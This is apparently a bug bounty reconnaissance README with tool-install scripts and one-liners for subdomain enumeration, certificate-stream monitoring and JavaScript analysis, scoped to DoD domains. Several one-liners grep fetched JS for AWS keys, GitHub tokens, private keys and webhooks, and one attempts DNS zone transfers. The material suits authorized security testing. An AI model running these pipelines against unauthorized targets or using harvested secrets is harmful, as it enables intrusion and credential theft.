Our main goal is to share tips from some well-known bug hunters. Using recon methodology, we are able to find subdomains, APIs, and tokens that are already exploitable, so we can report them. We want to promote one-liner tips and explain the commands, so that new hunters understand them better.


KingOfBugbounty/KingOfBugBountyTips



☠️ K I N G   O F   B U G   B O U N T Y ☠️

💀 KingOfBugBountyTips 💀

Bug Bounty Hunter

☠️ The Ultimate Bug Bounty Reconnaissance Arsenal ☠️

"In the shadows we hunt, in the code we trust" 🏴‍☠️

🔗 Connect with the Hacker

Telegram Twitter YouTube LinkedIn

╔══════════════════════════════════════════════════════════════════╗
║  "The quieter you become, the more you are able to hear" - Kali  ║
╚══════════════════════════════════════════════════════════════════╝

πŸŽ–οΈ Department of Defense - Bug Bounty Program

DoD VDP Β Β  KingRecon DOD




πŸ›‘οΈ DoD
Department of Defense

⭐ Army
U.S. Army

βš“ Navy
U.S. Navy

✈️ Air Force
U.S. Air Force

πŸ¦… Marines
U.S. Marines

πŸš€ Space Force
U.S. Space Force

📋 Full DoD Scope - 19 Domains
# 🎯 BBRF Scope - All DoD Domains (Copy & Paste Ready)
bbrf inscope add '*.af.mil' '*.army.mil' '*.marines.mil' '*.navy.mil' '*.spaceforce.mil' '*.ussf.mil' '*.pentagon.mil' '*.osd.mil' '*.disa.mil' '*.dtra.mil' '*.dla.mil' '*.dcma.mil' '*.dtic.mil' '*.dau.mil' '*.health.mil' '*.ng.mil' '*.uscg.mil' '*.socom.mil' '*.dds.mil' '*.yellowribbon.mil'
Scope entries (🎖️ military branches, 🏛️ DoD agencies, 🔧 support commands):
*.af.mil - Air Force
*.army.mil - Army
*.marines.mil - Marines
*.navy.mil - Navy
*.spaceforce.mil - Space Force
*.ussf.mil - Space Force
*.pentagon.mil - Pentagon HQ
*.osd.mil - Office of SecDef
*.disa.mil - Defense Info Systems
*.dtra.mil - Threat Reduction
*.dla.mil - Logistics Agency
*.dcma.mil - Contract Management
*.dtic.mil - Tech Info Center
*.dau.mil - Acquisition Univ
*.health.mil - Military Health
*.ng.mil - National Guard
*.uscg.mil - Coast Guard
*.socom.mil - Special Operations
*.dds.mil - Digital Service
*.yellowribbon.mil - Yellow Ribbon

📚 Table of Contents

| Section | Description |
|---|---|
| About | Project overview and goals |
| Quick Start | Get started in 5 minutes |
| Required Tools | Essential toolset |
| BBRF Scope DoD | DoD scope configuration |
| Subdomain Enumeration | Finding subdomains |
| JavaScript Recon | JS file analysis |
| XSS Detection | Cross-site scripting |
| SQL Injection | SQLi techniques |
| SSRF & SSTI | Server-side attacks |
| Web Crawling | Deep crawling methods |
| Parameter Discovery | Hidden params |
| Content Discovery | Sensitive files |
| Nuclei Scanning | Automated scanning |
| API Security Testing | API vulnerabilities |
| Cloud Security | AWS, GCP, Azure |
| Automation Scripts | Ready-to-use scripts |
| Bash Functions | Shell productivity |
| New Oneliners 2024-2025 | Latest techniques |
| Search Engines | Hacker search engines |
| Wordlists | Best wordlists |
| Resources | Books, courses, blogs |

🎯 About

Our main goal is to share tips from well-known bug hunters. Using recon methodology, we find subdomains, APIs, and tokens that are exploitable. We aim to influence the community with Oneliner tips for better understanding.

πŸ† What Makes This Repository Special?

  • 400+ Curated Oneliners - Battle-tested commands from real bug bounty hunters
  • Complete Methodology - From recon to exploitation
  • Constantly Updated - New techniques added regularly
  • Community Driven - Contributions from top hunters worldwide

Download BugBuntu: BugBuntu


🚀 Quick Start

Get your first recon running in under 5 minutes:

# 1. Install essential tools
go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest
go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest
go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest

# 2. Run your first recon
subfinder -d target.com -silent | httpx -silent | nuclei -severity critical,high

# 3. Profit! 🎉

πŸ› οΈ Required Tools


Core Tools

| Category | Tools | Installation |
|---|---|---|
| Subdomain | Subfinder, Amass, Assetfinder, Findomain, Chaos | go install github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest |
| HTTP Probing | Httpx, Httprobe | go install github.com/projectdiscovery/httpx/cmd/httpx@latest |
| Crawling | Katana, Gospider, Hakrawler, Cariddi | go install github.com/projectdiscovery/katana/cmd/katana@latest |
| URLs | Gau, Waybackurls, Waymore | go install github.com/lc/gau/v2/cmd/gau@latest |
| Scanning | Nuclei, Jaeles, Naabu | go install github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest |
| XSS | Dalfox, XSStrike, Kxss, Airixss | go install github.com/hahwul/dalfox/v2@latest |
| SQLi | SQLMap, Ghauri | pip install sqlmap ghauri |
| Utilities | Anew, Qsreplace, Unfurl, Gf, Uro | go install github.com/tomnomnom/anew@latest |
| Fuzzing | Ffuf, Feroxbuster | go install github.com/ffuf/ffuf/v2@latest |
| JS Analysis | Subjs, LinkFinder, SecretFinder, Jsubfinder | go install github.com/lc/subjs@latest |
| Cert Monitoring | Certstream, Certstream-go | pip install certstream |
| DNS | Dnsx, Shuffledns, PureDNS, MassDNS, Dnsgen | go install github.com/projectdiscovery/dnsx/cmd/dnsx@latest |
| Reverse DNS | Hakrevdns, Prips | go install github.com/hakluke/hakrevdns@latest |
| API Discovery | Arjun, x8, ParamSpider | pip install arjun |
| Screenshots | Gowitness, Eyewitness | go install github.com/sensepost/gowitness@latest |
| Cloud | AWS CLI, CloudEnum, S3Scanner | pip install awscli |
| OSINT | Shodan CLI, Censys, Metabigor | pip install shodan censys |
| Git Recon | Trufflehog, Gitrob, Github-Subdomains | go install github.com/trufflesecurity/trufflehog/v3@latest |
| Scope Management | BBRF | pip install bbrf |

System Dependencies

# Ubuntu/Debian
sudo apt update && sudo apt install -y \
    jq \
    curl \
    wget \
    git \
    python3 \
    python3-pip \
    golang-go \
    nmap \
    masscan \
    chromium-browser \
    parallel \
    whois \
    dnsutils \
    libpcap-dev \
    build-essential

# macOS
brew install jq curl wget git python3 go nmap masscan chromium parallel whois bind

Go Environment Setup

# Add to ~/.bashrc or ~/.zshrc
export GOPATH=$HOME/go
export GOROOT=/usr/local/go
export PATH=$PATH:$GOPATH/bin:$GOROOT/bin

# Reload shell
source ~/.bashrc  # or source ~/.zshrc

Quick Install Script - Go Tools

#!/bin/bash
# One-click install for all Go tools

echo "[*] Installing Go tools..."
go_tools=(
    # ProjectDiscovery
    "github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest"
    "github.com/projectdiscovery/httpx/cmd/httpx@latest"
    "github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest"
    "github.com/projectdiscovery/katana/cmd/katana@latest"
    "github.com/projectdiscovery/naabu/v2/cmd/naabu@latest"
    "github.com/projectdiscovery/dnsx/cmd/dnsx@latest"
    "github.com/projectdiscovery/shuffledns/cmd/shuffledns@latest"
    "github.com/projectdiscovery/chaos-client/cmd/chaos@latest"
    # Tomnomnom
    "github.com/tomnomnom/waybackurls@latest"
    "github.com/tomnomnom/anew@latest"
    "github.com/tomnomnom/qsreplace@latest"
    "github.com/tomnomnom/unfurl@latest"
    "github.com/tomnomnom/gf@latest"
    "github.com/tomnomnom/assetfinder@latest"
    "github.com/tomnomnom/httprobe@latest"
    # Fuzzing & Crawling
    "github.com/ffuf/ffuf/v2@latest"
    "github.com/jaeles-project/gospider@latest"
    "github.com/hakluke/hakrawler@latest"
    "github.com/hakluke/hakrevdns@latest"
    # Security
    "github.com/hahwul/dalfox/v2@latest"
    "github.com/lc/gau/v2/cmd/gau@latest"
    "github.com/lc/subjs@latest"
    # Screenshots & Utils
    "github.com/sensepost/gowitness@latest"
    "github.com/d3mondev/puredns/v2@latest"
    "github.com/j3ssie/metabigor@latest"
    "github.com/Emoe/kxss@latest"
    "github.com/ferreiraklet/airixss@latest"
    "github.com/edoardottt/cariddi/cmd/cariddi@latest"
    "github.com/trufflesecurity/trufflehog/v3@latest"
)

for tool in "${go_tools[@]}"; do
    echo "[+] Installing $tool"
    go install -v "$tool" 2>/dev/null
done

echo "[✓] Go tools installed!"

Quick Install Script - Python Tools

#!/bin/bash
# One-click install for all Python tools

echo "[*] Installing Python tools..."

pip3 install --upgrade pip

pip3 install \
    certstream \
    sqlmap \
    ghauri \
    uro \
    arjun \
    paramspider \
    shodan \
    censys \
    bbrf \
    dnsgen \
    waymore \
    xsstrike \
    s3scanner \
    cloud_enum \
    trufflehog

echo "[✓] Python tools installed!"

Quick Install Script - Rust Tools (Feroxbuster)

#!/bin/bash
# Install Feroxbuster (Rust)

echo "[*] Installing Rust tools..."

# Install Rust if not present
if ! command -v cargo &> /dev/null; then
    curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh -s -- -y
    source $HOME/.cargo/env
fi

# Install Feroxbuster
cargo install feroxbuster

echo "[✓] Rust tools installed!"

Quick Install Script - External Tools

#!/bin/bash
# Install tools that require cloning

echo "[*] Installing external tools..."

TOOLS_DIR="$HOME/tools"
mkdir -p $TOOLS_DIR && cd $TOOLS_DIR

# LinkFinder
git clone https://github.com/GerbenJavado/LinkFinder.git
cd LinkFinder && pip3 install -r requirements.txt && cd ..

# SecretFinder
git clone https://github.com/m4ll0k/SecretFinder.git
cd SecretFinder && pip3 install -r requirements.txt && cd ..

# Findomain
wget https://github.com/Findomain/Findomain/releases/latest/download/findomain-linux.zip
unzip findomain-linux.zip && chmod +x findomain && sudo mv findomain /usr/local/bin/

# MassDNS
git clone https://github.com/blechschmidt/massdns.git
cd massdns && make && sudo mv bin/massdns /usr/local/bin/ && cd ..

# Amass
go install -v github.com/owasp-amass/amass/v4/...@master

# GF Patterns
git clone https://github.com/1ndianl33t/Gf-Patterns.git
mkdir -p ~/.gf && cp Gf-Patterns/*.json ~/.gf/

echo "[✓] External tools installed!"

Master Install Script (All-in-One)

#!/bin/bash
# MASTER INSTALLER - Run all installation scripts

echo "╔══════════════════════════════════════════════════════════╗"
echo "║     KingOfBugBounty - Complete Tool Installation         ║"
echo "╚══════════════════════════════════════════════════════════╝"

# System dependencies (run with sudo)
echo "[1/5] Installing system dependencies..."
sudo apt update && sudo apt install -y jq curl wget git python3 python3-pip golang-go nmap masscan chromium-browser parallel whois dnsutils libpcap-dev build-essential

# Go environment
echo "[2/5] Setting up Go environment..."
echo 'export GOPATH=$HOME/go' >> ~/.bashrc
echo 'export PATH=$PATH:$GOPATH/bin' >> ~/.bashrc
source ~/.bashrc

# Go tools
echo "[3/5] Installing Go tools..."
go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest
go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest
go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest
go install -v github.com/projectdiscovery/katana/cmd/katana@latest
go install -v github.com/projectdiscovery/naabu/v2/cmd/naabu@latest
go install -v github.com/projectdiscovery/dnsx/cmd/dnsx@latest
go install -v github.com/projectdiscovery/shuffledns/cmd/shuffledns@latest
go install -v github.com/tomnomnom/waybackurls@latest
go install -v github.com/tomnomnom/anew@latest
go install -v github.com/tomnomnom/qsreplace@latest
go install -v github.com/tomnomnom/unfurl@latest
go install -v github.com/tomnomnom/gf@latest
go install -v github.com/tomnomnom/assetfinder@latest
go install -v github.com/ffuf/ffuf/v2@latest
go install -v github.com/hahwul/dalfox/v2@latest
go install -v github.com/lc/gau/v2/cmd/gau@latest
go install -v github.com/jaeles-project/gospider@latest
go install -v github.com/hakluke/hakrawler@latest
go install -v github.com/hakluke/hakrevdns@latest
go install -v github.com/sensepost/gowitness@latest
go install -v github.com/d3mondev/puredns/v2@latest
go install -v github.com/owasp-amass/amass/v4/...@master

# Python tools
echo "[4/5] Installing Python tools..."
pip3 install certstream sqlmap ghauri uro arjun shodan censys bbrf dnsgen waymore

# Rust tools
echo "[5/5] Installing Rust tools..."
if ! command -v cargo &> /dev/null; then
    curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh -s -- -y
    source $HOME/.cargo/env
fi
cargo install feroxbuster

# Update Nuclei templates
nuclei -update-templates

echo ""
echo "╔══════════════════════════════════════════════════════════╗"
echo "║            ✓ Installation Complete!                      ║"
echo "╚══════════════════════════════════════════════════════════╝"
echo ""
echo "Run 'source ~/.bashrc' to reload your environment"

Wordlists Installation

#!/bin/bash
# Install essential wordlists

WORDLIST_DIR="$HOME/wordlists"
mkdir -p $WORDLIST_DIR && cd $WORDLIST_DIR

# SecLists
git clone https://github.com/danielmiessler/SecLists.git

# Assetnote Wordlists
wget -r --no-parent -R "index.html*" https://wordlists-cdn.assetnote.io/data/ -nH

# OneListForAll
git clone https://github.com/six2dez/OneListForAll.git

# Resolvers
wget https://raw.githubusercontent.com/trickest/resolvers/main/resolvers.txt -O resolvers.txt
wget https://raw.githubusercontent.com/trickest/resolvers/main/resolvers-trusted.txt -O resolvers-trusted.txt

echo "[✓] Wordlists installed in $WORDLIST_DIR"

Verify Installation

#!/bin/bash
# Verify all tools are installed

echo "Checking installed tools..."

tools=("subfinder" "httpx" "nuclei" "katana" "naabu" "dnsx" "ffuf" "feroxbuster" "dalfox" "gau" "waybackurls" "anew" "qsreplace" "gf" "gospider" "hakrawler" "amass" "gowitness" "certstream" "sqlmap" "arjun" "shodan")

for tool in "${tools[@]}"; do
    if command -v "$tool" &> /dev/null; then
        echo "[✓] $tool"
    else
        echo "[✗] $tool - NOT FOUND"
    fi
done

🎯 BBRF Scope DoD

# Add all DoD domains to BBRF scope
bbrf inscope add '*.af.mil' '*.osd.mil' '*.marines.mil' '*.pentagon.mil' '*.disa.mil' '*.health.mil' '*.dau.mil' '*.dtra.mil' '*.ng.mil' '*.dds.mil' '*.uscg.mil' '*.army.mil' '*.dcma.mil' '*.dla.mil' '*.dtic.mil' '*.yellowribbon.mil' '*.socom.mil' '*.spaceforce.mil' '*.ussf.mil'

💀 Subdomain Enumeration ☠️


☠️ ENUMERATE EVERYTHING ☠️

💀 Multi-Source Discovery (All-in-One)

# ☠️ Ultimate subdomain enumeration - All tools combined
subfinder -d target.com -all -silent | anew subs.txt
amass enum -passive -d target.com | anew subs.txt
assetfinder -subs-only target.com | anew subs.txt
chaos -d target.com -silent | anew subs.txt
findomain -t target.com -q | anew subs.txt
cat subs.txt | httpx -silent -threads 200 | anew alive.txt

💀 Certificate Transparency Logs

# ☠️ crt.sh extraction
curl -s "https://crt.sh/?q=%25.target.com&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u | httpx -silent

💀 Certstream Real-Time Monitoring - Basic

# ☠️ Monitor certificates in real-time for specific keyword
pip install certstream && python3 -c "import certstream; certstream.listen_for_events(lambda msg, ctx: print(msg['data']['leaf_cert']['subject']['CN']) if 'target' in str(msg.get('data',{}).get('leaf_cert',{}).get('subject',{}).get('CN','')) else None, url='wss://certstream.calidog.io/')"

💀 Certstream with Domain Filter

# ☠️ Real-time cert monitoring filtered by domain keywords
# The certstream CLI only emits JSON lines with --json (--full is the human-readable SAN view), so jq needs --json
certstream --json | jq -r 'select(.data.leaf_cert.subject.CN != null) | .data.leaf_cert.subject.CN' | grep -iE "(target|company|brand)" | anew certstream_targets.txt

💀 Certstream to Subdomain Discovery

# ☠️ Extract all SANs (Subject Alternative Names) in real-time
certstream --json | jq -r '.data.leaf_cert.extensions.subjectAltName // empty' | tr ',' '\n' | sed 's/DNS://g' | grep -E "target\.com$" | sort -u | anew certstream_subs.txt

💀 Certstream + httpx Live Pipeline

# ☠️ Real-time cert discovery -> immediate alive check
certstream --json | jq -r '.data.leaf_cert.all_domains[]? // empty' 2>/dev/null | grep -iE "target" | sort -u | while read domain; do echo "$domain" | httpx -silent -timeout 3 | anew live_certs.txt; done

💀 Certstream Phishing Detection

# ☠️ Monitor for potential phishing domains (brand impersonation)
certstream --json | jq -r '.data.leaf_cert.subject.CN // empty' | grep -iE "(paypal|apple|google|microsoft|amazon|facebook|netflix|bank)" | grep -vE "\.(paypal|apple|google|microsoft|amazon|facebook|netflix)\.com$" | anew phishing_certs.txt

💀 Certstream with Nuclei Auto-Scan

# ☠️ Real-time cert discovery -> automatic vulnerability scan
certstream --json | jq -r '.data.leaf_cert.all_domains[]? // empty' | grep -E "\.target\.com$" | sort -u | while read domain; do echo "https://$domain" | nuclei -t /nuclei-templates/technologies/ -silent; done

💀 Certstream Mass Collector Script

# ☠️ Collect all certificates for specific TLDs
timeout 3600 bash -c 'certstream --json | jq -r ".data.leaf_cert.all_domains[]? // empty" | grep -E "\.(gov|mil|edu)$" | anew gov_mil_edu_certs.txt' &

💀 Certstream Wildcard Certificate Hunter

# ☠️ Find wildcard certificates (*.domain.com) in real-time
certstream --json | jq -r '.data.leaf_cert.subject.CN // empty' | grep "^\*\." | sed 's/^\*\.//' | sort -u | anew wildcard_domains.txt

💀 Certstream + Shodan Enrichment

# ☠️ Real-time certs -> resolve IP -> Shodan lookup
certstream --json | jq -r '.data.leaf_cert.subject.CN // empty' | grep -iE "target" | while read domain; do IP=$(dig +short "$domain" | head -1); [ -n "$IP" ] && echo "$domain,$IP,$(shodan host $IP 2>/dev/null | head -3 | tr '\n' ' ')"; done | anew cert_shodan.txt

💀 Certstream JSON Logger with Timestamp

# ☠️ Full certificate logging with timestamps for analysis
certstream --json | jq -c '{timestamp: now | strftime("%Y-%m-%d %H:%M:%S"), cn: .data.leaf_cert.subject.CN, domains: .data.leaf_cert.all_domains, issuer: .data.leaf_cert.issuer.O}' | grep -i "target" | tee -a certstream_log.json

💀 Certstream Bug Bounty Scope Monitor

# ☠️ Monitor multiple bug bounty targets simultaneously
TARGETS="hackerone|bugcrowd|intigriti|yeswehack"; certstream --json | jq -r '.data.leaf_cert.all_domains[]? // empty' | grep -iE "$TARGETS" | anew bb_new_assets.txt &
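
The crt.sh and certstream one-liners above filter with grep -iE "target", which also accepts nottarget.com or target.com.evil.example. Added example, not part of the repository: a Python helper that checks scope on a label boundary, strips wildcard labels, and reads both a crt.sh JSON result (name_value can hold several newline-separated names) and a certstream JSON event, skipping heartbeats; the sample data is constructed and target.com is the placeholder domain.

```python
import json

# Constructed sample of a crt.sh JSON response (the output=json form used
# above); real entries carry more fields, and name_value may hold several
# names separated by newlines, wildcards included.
CRTSH_SAMPLE = json.dumps([
    {"issuer_name": "C=US, O=Let's Encrypt, CN=R3",
     "name_value": "www.target.com\n*.target.com"},
    {"issuer_name": "C=US, O=Let's Encrypt, CN=R3",
     "name_value": "api.target.com"},
    {"issuer_name": "C=US, O=Example CA", "name_value": "nottarget.com"},
    {"issuer_name": "C=US, O=Example CA", "name_value": "target.com.evil.example"},
    {"issuer_name": "C=US, O=Example CA", "name_value": "Dev.Target.com."},
])

# Constructed certstream events in the shape the certstream CLI emits as
# JSON: one certificate update and one heartbeat (which carries no data).
CERTSTREAM_SAMPLE = json.dumps({
    "message_type": "certificate_update",
    "data": {"leaf_cert": {
        "subject": {"CN": "*.internal.target.com"},
        "all_domains": ["*.internal.target.com", "vpn.target.com",
                        "target.com", "cdn.example.net"]}},
})
HEARTBEAT_SAMPLE = json.dumps({"message_type": "heartbeat", "timestamp": 0})


def normalize(name):
    """Lower-case, drop a trailing dot and a leading wildcard label."""
    name = name.strip().lower().rstrip(".")
    return name[2:] if name.startswith("*.") else name


def in_scope(host, domain):
    """True only for the apex itself or a subdomain on a label boundary,
    so nottarget.com and target.com.evil.example are rejected."""
    return host == domain or host.endswith("." + domain)


def hostnames_from_crtsh(raw_json, domain):
    """Unique in-scope hostnames from a crt.sh JSON result."""
    found = set()
    for entry in json.loads(raw_json):
        for name in entry.get("name_value", "").split("\n"):
            host = normalize(name)
            if host and in_scope(host, domain):
                found.add(host)
    return sorted(found)


def hostnames_from_certstream(raw_line, domain):
    """Unique in-scope hostnames from one certstream JSON event."""
    event = json.loads(raw_line)
    if event.get("message_type") != "certificate_update":
        return []  # heartbeats and other control messages carry no cert
    leaf = event.get("data", {}).get("leaf_cert", {})
    candidates = leaf.get("all_domains") or [leaf.get("subject", {}).get("CN", "")]
    hosts = {normalize(n) for n in candidates}
    return sorted(h for h in hosts if h and in_scope(h, domain))


if __name__ == "__main__":
    print(hostnames_from_crtsh(CRTSH_SAMPLE, "target.com"))
    print(hostnames_from_certstream(CERTSTREAM_SAMPLE, "target.com"))
    print(hostnames_from_certstream(HEARTBEAT_SAMPLE, "target.com"))
```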

💀 Shodan + Nuclei Pipeline

# ☠️ Shodan recon -> Nuclei scan
shodan domain target.com | awk '{print $3}' | httpx -silent | nuclei -t /nuclei-templates/ -severity critical,high

💀 ASN Discovery & Reverse DNS

# ☠️ Find all IPs from organization ASN
echo 'target_org' | metabigor net --org -v | awk '{print $3}' | sed 's/[[0-9]]\+\.//g' | xargs -I@ sh -c 'prips @ | hakrevdns | anew'

💀 DNS Bruteforce with Shuffledns

shuffledns -d target.com -w wordlist.txt -r resolvers.txt -silent | httpx -silent | anew

💀 Recursive Subdomain Enum

subfinder -d target.com -recursive -all -silent | dnsx -silent | httpx -silent | anew recursive_subs.txt

💀 Passive DNS - Multiple Sources

# ☠️ HackerTarget
curl -s "https://api.hackertarget.com/hostsearch/?q=target.com" | cut -d',' -f1 | anew subs.txt

# ☠️ RapidDNS
curl -s "https://rapiddns.io/subdomain/target.com?full=1" | grep -oP '(?<=target="_blank">)[^<]+' | grep "target.com" | anew subs.txt

# ☠️ Riddler.io
curl -s "https://riddler.io/search/exportcsv?q=pld:target.com" | grep -oP '\b([a-zA-Z0-9]([a-zA-Z0-9-]*[a-zA-Z0-9])?\.)+target\.com\b' | anew subs.txt

# ☠️ AlienVault OTX
curl -s "https://otx.alienvault.com/api/v1/indicators/domain/target.com/passive_dns" | jq -r '.passive_dns[].hostname' 2>/dev/null | sort -u | anew subs.txt

# ☠️ URLScan.io
curl -s "https://urlscan.io/api/v1/search/?q=domain:target.com" | jq -r '.results[].page.domain' 2>/dev/null | sort -u | anew subs.txt

💀 GitHub Subdomain Scraping

github-subdomains -d target.com -t YOUR_GITHUB_TOKEN -o github_subs.txt

💀 Censys Subdomain Discovery

# ☠️ Using Censys API
censys search "target.com" --index-type hosts | jq -r '.[] | .name' | sort -u | anew censys_subs.txt

💀 SecurityTrails API

# ☠️ SecurityTrails subdomain enumeration
curl -s "https://api.securitytrails.com/v1/domain/target.com/subdomains" -H "APIKEY: YOUR_API_KEY" | jq -r '.subdomains[]' | sed 's/$/.target.com/' | anew subs.txt

💀 Wayback Machine Subdomains

# ☠️ Extract subdomains from Wayback Machine
curl -s "http://web.archive.org/cdx/search/cdx?url=*.target.com/*&output=text&fl=original&collapse=urlkey" | sed -e 's_https*://__' -e 's/\/.*//g' | sort -u | anew wayback_subs.txt

💀 CommonCrawl Extraction

# ☠️ CommonCrawl subdomain extraction
curl -s "https://index.commoncrawl.org/CC-MAIN-2023-50-index?url=*.target.com&output=json" | jq -r '.url' | sed -e 's_https*://__' -e 's/\/.*//g' | sort -u | anew commoncrawl_subs.txt

💀 VirusTotal Subdomains

# ☠️ VirusTotal API
curl -s "https://www.virustotal.com/vtapi/v2/domain/report?apikey=YOUR_API_KEY&domain=target.com" | jq -r '.subdomains[]' 2>/dev/null | anew vt_subs.txt

💀 DNS Zone Transfer Attempt

# ☠️ Check for zone transfer vulnerability
dig axfr @ns1.target.com target.com | grep -E "^[a-zA-Z0-9]" | awk '{print $1}' | sed 's/\.$//' | anew zone_transfer.txt

💀 Reverse IP Lookup

# ☠️ Find domains on same IP
host target.com | awk '/has address/ {print $4}' | xargs -I@ sh -c 'curl -s "https://api.hackertarget.com/reverseiplookup/?q=@"' | anew reverse_ip.txt

💀 BGP/ASN Range Scanner

# ☠️ Get ASN and scan all IP ranges
whois -h whois.radb.net -- '-i origin AS12345' | grep -Eo "([0-9.]+){4}/[0-9]+" | xargs -I@ sh -c 'nmap -sL @ | grep "report for" | cut -d" " -f5' | httpx -silent | anew bgp_hosts.txt

💀 PTR Records from IP Range

# ☠️ Mass PTR lookup
prips 192.168.1.0/24 | xargs -P50 -I@ sh -c 'host @ 2>/dev/null | grep "pointer" | cut -d" " -f5' | sed 's/\.$//' | anew ptr_subs.txt

💀 All-in-One Mega Oneliner

# ☠️ THE ULTIMATE SUBDOMAIN HUNTER ☠️
(subfinder -d target.com -all -silent; amass enum -passive -d target.com; assetfinder -subs-only target.com; findomain -t target.com -q; chaos -d target.com -silent; curl -s "https://crt.sh/?q=%25.target.com&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g'; curl -s "https://api.hackertarget.com/hostsearch/?q=target.com" | cut -d',' -f1; curl -s "http://web.archive.org/cdx/search/cdx?url=*.target.com/*&output=text&fl=original&collapse=urlkey" | sed -e 's_https*://__' -e 's/\/.*//g') | sort -u | httpx -silent -threads 100 | anew mega_subs.txt

💀 Subdomain Permutation/Bruteforce

# ☠️ Generate permutations and resolve
cat subs.txt | dnsgen - | shuffledns -d target.com -r resolvers.txt -silent | anew permutation_subs.txt

💀 DNS Wordlist Bruteforce with PureDNS

# ☠️ Fast bruteforce with PureDNS
puredns bruteforce wordlist.txt target.com -r resolvers.txt -w puredns_subs.txt

💀 TLS/SSL Certificate Grabber

# ☠️ Extract subdomains from SSL certificates
echo target.com | httpx -silent | xargs -I@ sh -c 'echo | openssl s_client -connect @:443 2>/dev/null | openssl x509 -noout -text | grep -oP "DNS:[^\s,]+" | sed "s/DNS://"' | sort -u | anew ssl_subs.txt

💀 Favicon Hash -> Shodan

# ☠️ Find related hosts via favicon hash
# Shodan indexes the MurmurHash3 of the base64-encoded favicon (not an MD5), so compute it with mmh3 (pip install mmh3)
curl -s https://target.com/favicon.ico | python3 -c "import sys,codecs,mmh3; print(mmh3.hash(codecs.encode(sys.stdin.buffer.read(),'base64')))" | xargs -I@ shodan search "http.favicon.hash:@" --fields ip_str,hostnames | anew favicon_hosts.txt

💀 Google Dork Subdomain Discovery

# ☠️ Use Google dorks (manual or with tools)
# site:*.target.com -www
# inurl:target.com
# inurl:target.com

📜 JavaScript Recon

Complete JS Pipeline

subfinder -d target.com -silent | httpx -silent | katana -d 5 -jc -silent | grep -iE '\.js$' | anew js.txt

Extract Secrets from JS

cat js.txt | httpx -silent -sr -srd js_files/ && nuclei -l js.txt -t http/exposures/ -silent

LinkFinder on JS Files

cat js.txt | xargs -I@ -P10 bash -c 'python3 linkfinder.py -i @ -o cli 2>/dev/null' | anew endpoints.txt

SecretFinder Mass Scan

cat js.txt | xargs -I@ -P5 python3 SecretFinder.py -i @ -o cli | anew secrets.txt

JS Variables Extraction

cat file.js | grep -oE "var\s+\w+\s*=\s*['\"][^'\"]+['\"]" | sort -u

API Keys from JS

cat js.txt | nuclei -t http/exposures/tokens/ -silent | anew api_keys.txt

Extract All URLs from JS

cat js.txt | xargs -I@ curl -s @ | grep -oE "https?://[^\"'\`[:space:]<>]+" | sort -u | anew js_urls.txt

Find API Endpoints in JS

cat js.txt | xargs -I@ curl -s @ | grep -oE "(/api/[^\"'\`[:space:]<>]+|/v[0-9]+/[^\"'\`[:space:]<>]+)" | sort -u

Extract Hardcoded Credentials

cat js.txt | xargs -I@ curl -s @ | grep -iE "(password|passwd|pwd|secret|api_key|apikey|token|auth)" | sort -u

Extract AWS Keys from JS

cat js.txt | xargs -I@ curl -s @ | grep -oE "(AKIA[0-9A-Z]{16}|ABIA[0-9A-Z]{16}|ACCA[0-9A-Z]{16}|ASIA[0-9A-Z]{16})" | sort -u | anew aws_keys.txt

Extract Google API Keys from JS

cat js.txt | xargs -I@ curl -s @ | grep -oE "AIza[0-9A-Za-z\-_]{35}" | sort -u | anew google_api_keys.txt

Extract Firebase URLs from JS

cat js.txt | xargs -I@ curl -s @ | grep -oE "https://[a-zA-Z0-9-]+\.firebaseio\.com|https://[a-zA-Z0-9-]+\.firebase\.com" | sort -u | anew firebase_urls.txt

Extract S3 Buckets from JS

cat js.txt | xargs -I@ curl -s @ | grep -oE "[a-zA-Z0-9.-]+\.s3\.amazonaws\.com|s3://[a-zA-Z0-9.-]+|s3-[a-zA-Z0-9-]+\.amazonaws\.com/[a-zA-Z0-9.-]+" | sort -u | anew s3_from_js.txt

Extract Internal IPs from JS

cat js.txt | xargs -I@ curl -s @ | grep -oE "(10\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}|172\.(1[6-9]|2[0-9]|3[0-1])\.[0-9]{1,3}\.[0-9]{1,3}|192\.168\.[0-9]{1,3}\.[0-9]{1,3})" | sort -u | anew internal_ips.txt

Extract Slack Webhooks from JS

cat js.txt | xargs -I@ curl -s @ | grep -oE "https://hooks\.slack\.com/services/T[a-zA-Z0-9_]+/B[a-zA-Z0-9_]+/[a-zA-Z0-9_]+" | sort -u | anew slack_webhooks.txt

Extract GitHub Tokens from JS

cat js.txt | xargs -I@ curl -s @ | grep -oE "(ghp_[a-zA-Z0-9]{36}|gho_[a-zA-Z0-9]{36}|ghu_[a-zA-Z0-9]{36}|ghs_[a-zA-Z0-9]{36}|ghr_[a-zA-Z0-9]{36}|github_pat_[a-zA-Z0-9]{22}_[a-zA-Z0-9]{59})" | sort -u | anew github_tokens.txt

Extract Private Keys from JS

cat js.txt | xargs -I@ curl -s @ | grep -oE "-----BEGIN (RSA |EC |DSA |OPENSSH |PGP )?PRIVATE KEY( BLOCK)?-----" | sort -u | anew private_keys_found.txt

Extract Email Addresses from JS

cat js.txt | xargs -I@ curl -s @ | grep -oE "[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}" | sort -u | anew emails_from_js.txt

Extract Hidden Subdomains from JS

cat js.txt | xargs -I@ curl -s @ | grep -oE "https?://[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}" | sed 's|https\?://||' | cut -d'/' -f1 | sort -u | anew subdomains_from_js.txt

💀 Extract GraphQL Endpoints from JS

